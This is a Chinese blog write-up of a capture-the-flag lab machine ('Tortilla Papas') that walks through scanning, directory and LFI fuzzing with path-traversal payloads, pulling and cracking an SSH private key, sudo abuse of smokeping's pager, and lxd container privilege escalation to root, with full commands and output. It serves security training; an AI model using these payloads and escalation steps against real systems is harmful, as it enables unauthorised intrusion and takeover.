Pepster'Blog
TheHackersLabs-Tortilla Papas靶机详解WP
城南花已开 Lv5
  2025-01-05 14:12:18   2025-01-22 19:49:12    2k 字  11 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.139  08:00:27:02:50:f0       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 4 responded
export ip=192.168.60.139
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.139:22
Open 192.168.60.139:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 14:13 CST
Initiating ARP Ping Scan at 14:13
Scanning 192.168.60.139 [1 port]
Completed ARP Ping Scan at 14:13, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:13
Completed Parallel DNS resolution of 1 host. at 14:13, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:13
Scanning 192.168.60.139 [2 ports]
Discovered open port 80/tcp on 192.168.60.139
Discovered open port 22/tcp on 192.168.60.139
Completed SYN Stealth Scan at 14:13, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.139
Host is up, received arp-response (0.00070s latency).
Scanned at 2025-01-05 14:13:07 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:02:50:F0 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

访问一下80端口,没有什么信息,里面都是锚点链接

image

尝试扫一下目录,出了一个SmokePing,好像是监测网络延迟的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.139
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.60.139/images/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.139/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.60.139/js/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.139/javascript/]
/smokeping            (Status: 301) [Size: 320] [--> http://192.168.60.139/smokeping/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

没什么可以利用的点,网络上也没有相关披露的poc

LFI文件包含

换了好多个字典,扫到一个agua.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/dutch/list_7.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.139
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/dutch/list_7.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/agua.php             (Status: 200) [Size: 26594]
Progress: 31320 / 31325 (99.98%)
===============================================================
Finished
===============================================================

访问一下,还是原来的首页

猜测具有LFI文件包含漏洞文件包含/路径遍历 - HackTricks — File Inclusion/Path traversal - HackTricks

尝试利用wfuzz模糊测试一下

相关字典我贴在下面

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists

我只截取了/etc/passwd不然就太大了,测好久

找到关键参数file并发现目录深度为3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ wfuzz -c -u "http://$ip/agua.php?FUZZ=FUZ2Z" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -w LFI.txt --hc 404 --hw 1556
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.139/agua.php?FUZZ=FUZ2Z
Total requests: 584848

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000010602:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//etc/passwd"
000010596:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//....//....//....//etc/passwd"
000010587:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//....//....//....//....//....//....//..../
                                                        /....//....//....//....//....//etc/passwd"
000010593:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//....//....//....//....//....//....//etc/p
                                                        asswd"
000010590:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//....//....//....//....//....//....//..../
                                                        /....//....//etc/passwd"
000010584:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//....//....//....//....//....//....//..../
                                                        /....//....//....//....//....//....//....//....//etc/passwd"
000010599:   200        507 L    1588 W     27943 Ch    "file - ....//....//....//....//....//....//etc/passwd"

可让我逮到了机会了

image

发现有这么个普通用户sincebolla 还有concebolla

尝试枚举文件

继续枚举,在/opt下发现了个私钥文件

尝试利用这个私钥连接用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
❯ curl http://192.168.60.139/agua.php\?file\=....//....//....//opt/id_rsa
<!DOCTYPE html>
<html>
   <head>
      <!-- basic -->
……省略……
-----BEGIN OPENSSH PRIVATE KEY-----
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
rbxo5ujDv50IlgWtMbqTzTrZMbw=
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
honda1           (id_rsa)
1g 0:00:01:19 DONE (2025-01-05 15:49) 0.01252g/s 44.50p/s 44.50c/s 44.50C/s cougar..01234
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

用户提权

我发现只要是这个靶场的靶机私钥都是加密了的🤣

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Linux tortillapapas 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 18 12:40:58 2024 from 192.168.0.104
sincebolla@tortillapapas:~$ ls
user.txt
sincebolla@tortillapapas:~$ cat user.txt
1cf125d2f4596108e4ef88c20ace1fc1
sincebolla@tortillapapas:~$ sudo -l
Matching Defaults entries for sincebolla on tortillapapas:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sincebolla may run the following commands on tortillapapas:
    (concebolla) NOPASSWD: /usr/sbin/smokeping

sudo提权

还有用户concebolla的sudo权限,看一下这个smokeping帮助手册,如何使用的

发现可以可以看manpage,利用man调用less来阅读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sincebolla@tortillapapas:~$ sudo -u  concebolla /usr/sbin/smokeping --help
Usage:
    smokeping [ --email | --makepod | --version | --restart ]

     Options:

     --man[=x]    Show the manpage for the program (or for probe x, if specified)

     --help       Help :-)

    ………………省略………………

     --shared-secret=s File containing the shared secret for talking to the server.

     --cache-dir=s Directory for temporary data storage when running in slave mode.

     --pid-dir=s Directory for the PID file when running in slave mode.
                 (optional, defaults to --cache-dir)

那直接less提权即可

image

Root提权

1
2
concebolla@tortillapapas:/home/sincebolla$ id
uid=1000(concebolla) gid=1000(concebolla) grupos=1000(concebolla),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1002(lxd)

同时发现这个用户在lxd组中

lxd提权即可具体可以参考[[Vulnhub]Prime (2021) 2靶机详解WP | Pepster’Blog](https://pepster.me/2024/12/11/VulnHub-Prime (2021) 2靶机详解WP/)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
concebolla@tortillapapas:/tmp$ wget 192.168.60.100/lxd.tar.xz
--2025-01-05 09:21:27--  http://192.168.60.100/lxd.tar.xz
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 896 [application/octet-stream]
Grabando a: «lxd.tar.xz»

lxd.tar.xz                            100%[=======================================================================>]     896  --.-KB/s    en 0s

2025-01-05 09:21:27 (114 MB/s) - «lxd.tar.xz» guardado [896/896]

concebolla@tortillapapas:/tmp$ wget 192.168.60.100/rootfs.squashfs
--2025-01-05 09:21:39--  http://192.168.60.100/rootfs.squashfs
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3092480 (2.9M) [application/octet-stream]
Grabando a: «rootfs.squashfs»

rootfs.squashfs                       100%[=======================================================================>]   2.95M  --.-KB/s    en 0.1s

2025-01-05 09:21:40 (26.4 MB/s) - «rootfs.squashfs» guardado [3092480/3092480]

concebolla@tortillapapas:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 8300692522052a791a2509d9b6e81f74937de1bd3eb3289e747f3fbbc954aeaa
concebolla@tortillapapas:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
concebolla@tortillapapas:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
Device host-root added to privesc
bash: Device: orden no encontrada
concebolla@tortillapapas:/tmp$ lxc start privesc
concebolla@tortillapapas:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
9df6598994dbd7a4f843b6f326f81f18

ok结束了🥳

  1. 信息收集
    1. 服务探测
    2. LFI文件包含
    3. 尝试枚举文件
  2. 用户提权
    1. sudo提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. LFI文件包含
    3. 尝试枚举文件
  2. 用户提权
    1. sudo提权
  3. Root提权